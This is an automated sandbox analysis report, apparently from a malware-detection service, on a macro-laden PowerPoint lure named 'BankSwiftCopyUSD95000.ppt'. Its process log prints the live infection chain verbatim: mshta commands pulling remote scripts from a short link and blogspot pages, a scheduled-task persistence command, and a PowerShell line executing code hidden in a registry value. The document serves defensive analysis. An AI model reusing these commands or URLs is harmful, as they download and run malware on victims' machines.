Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 76D20000 page execute and read and write

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_003FB2EE NtQuerySystemInformation,	12_2_003FB2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_003FB2CC NtQuerySystemInformation,	12_2_003FB2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01D9B2EE NtQuerySystemInformation,	24_2_01D9B2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01D9B2CC NtQuerySystemInformation,	24_2_01D9B2CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CEB2EE NtQuerySystemInformation,	33_2_01CEB2EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CEB2CC NtQuerySystemInformation,	33_2_01CEB2CC

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02A518A8	12_2_02A518A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02A574B7	12_2_02A574B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02A51897	12_2_02A51897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02A574C8	12_2_02A574C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02A5618D	12_2_02A5618D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02A51538	12_2_02A51538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02A51548	12_2_02A51548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_02871897	24_2_02871897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_028718A8	24_2_028718A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_028774B7	24_2_028774B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_028774C8	24_2_028774C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_02871538	24_2_02871538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_02871548	24_2_02871548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 29_2_001E6020	29_2_001E6020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 29_2_001E5408	29_2_001E5408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 29_2_001E5750	29_2_001E5750
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02A018A8	33_2_02A018A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02A074B7	33_2_02A074B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02A01897	33_2_02A01897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02A074C8	33_2_02A074C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02A0618D	33_2_02A0618D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02A01538	33_2_02A01538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02A01548	33_2_02A01548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_02AE1BE2	33_2_02AE1BE2

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: BankSwiftCopyUSD95000.ppt	OLE, VBA macro line: Sub Auto_Close()
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function Auto_Close			Name: Auto_Close

Document contains embedded VBA macros

Source: BankSwiftCopyUSD95000.ppt

OLE indicator, VBA macros: true

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: BankSwiftCopyUSD95000.ppt

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: 29.2.MSBuild.exe.400000.2.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 29.2.MSBuild.exe.400000.2.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winPPT@46/51@29/5

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_003FACEE AdjustTokenPrivileges,	12_2_003FACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_003FACB7 AdjustTokenPrivileges,	12_2_003FACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01D9ACEE AdjustTokenPrivileges,	24_2_01D9ACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01D9ACB7 AdjustTokenPrivileges,	24_2_01D9ACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CEACEE AdjustTokenPrivileges,	33_2_01CEACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CEACB7 AdjustTokenPrivileges,	33_2_01CEACB7

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BankSwiftCopyUSD95000.LNK

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC735.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................x.x...............x...............x.......x.....	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................x.x.............................X.'.......x.....	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................x.x...............x.......................x.....	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................6.......................x.x.............................X.'.......x.....	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................?.......................x.x...............x.......................x.....	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............................S.......................x.x.....#.......................X.'.......x.....	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............................\.......................x.x.....#.........x.......................x.....	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Console Write: .................................................v-.............................................................................................	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Console Write: ................................................d1......................L...............d...............................X.......B.........3.....
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................l.......T.......................................................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h.......v.......................................................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h...............................................................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h...............................................................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h...............................................................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................d.......................................#.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................d.......................................#.......................................
Source: C:\Windows\System32\taskkill.exe	Console Write: ................................................d1......................................b...............................T.......B.........'.....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................P.z.......................%.....P.z.......%....... .....`I"........v.....................K).......Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....8.p.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j..... ..............................}..v......p.....0.................Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v......p.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....x.Y.............................}..v....0.p.....0.................Y.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j....................................}..v....0.q.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j....(.Y.............................}..v......q.....0.................Y.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............`.......\|.......G.......................................X...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............`.......\|.......h.......................................................X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............`.......\|.......q.......................................X...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............`.......\|...............................................................X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............`.......................................................X...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............`...............................................#.......................X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............`...............................................#.......X...............................

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Windows\System32\PING.EXE	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "winword.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EXCEL.exe")
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: BankSwiftCopyUSD95000.ppt	Virustotal: Detection: 34%
Source: BankSwiftCopyUSD95000.ppt	ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
Source: unknown	Process created: C:\Windows\System32\PING.EXE ping.exe
Source: unknown	Process created: C:\Windows\System32\mshta.exe mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv
Source: unknown	Process created: C:\Windows\System32\PING.EXE ping.exe
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX
Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {2ABF5983-E6CF-46DC-B95A-53E1F6F4D156} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).meather)\|IEX'', 0 : window.close')
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)\|IEX
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://backbones1234511a.blogspot.com/p/stback1.html'', 0 : window.close')
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://startthepartyup.blogspot.com/p/backbone14.html'', 0 : window.close')
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html'', 0 : window.close')
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process created: C:\Windows\System32\PING.EXE ping.exe	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process created: C:\Windows\System32\mshta.exe mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process created: C:\Windows\System32\PING.EXE ping.exe	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)\|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)\|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: Managament.inf.pdb source: powershell.exe, 0000000C.00000002.2287134514.0000000006951000.00000004.00000001.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 0000000C.00000002.2254678756.0000000002B60000.00000002.00000001.sdmp

Source: BankSwiftCopyUSD95000.ppt

Initial sample: OLE document summary bytes = 0

Source: BankSwiftCopyUSD95000.ppt

Initial sample: OLE document summary hiddenslides = 0

Source: BankSwiftCopyUSD95000.ppt

Initial sample: OLE document summary mmclips = 0

Source: BankSwiftCopyUSD95000.ppt

Initial sample: OLE document summary notes = 0

Source: BankSwiftCopyUSD95000.ppt

Initial sample: OLE document summary presentationtarget = Widescreen

Source: BankSwiftCopyUSD95000.ppt

Initial sample: OLE document summary slides = 0

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: BankSwiftCopyUSD95000.ppt	Stream path 'VBA/Module1' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Module1			Name: Module1

Document contains an embedded VBA with many randomly named variables

Source: BankSwiftCopyUSD95000.ppt

Stream path 'VBA/Module1' : High entropy of concatenated variable names

Yara detected Costura Assembly Loader

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_0040921A pushad ; ret	12_2_0040921D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_004091D2 push eax; ret	12_2_004091D5
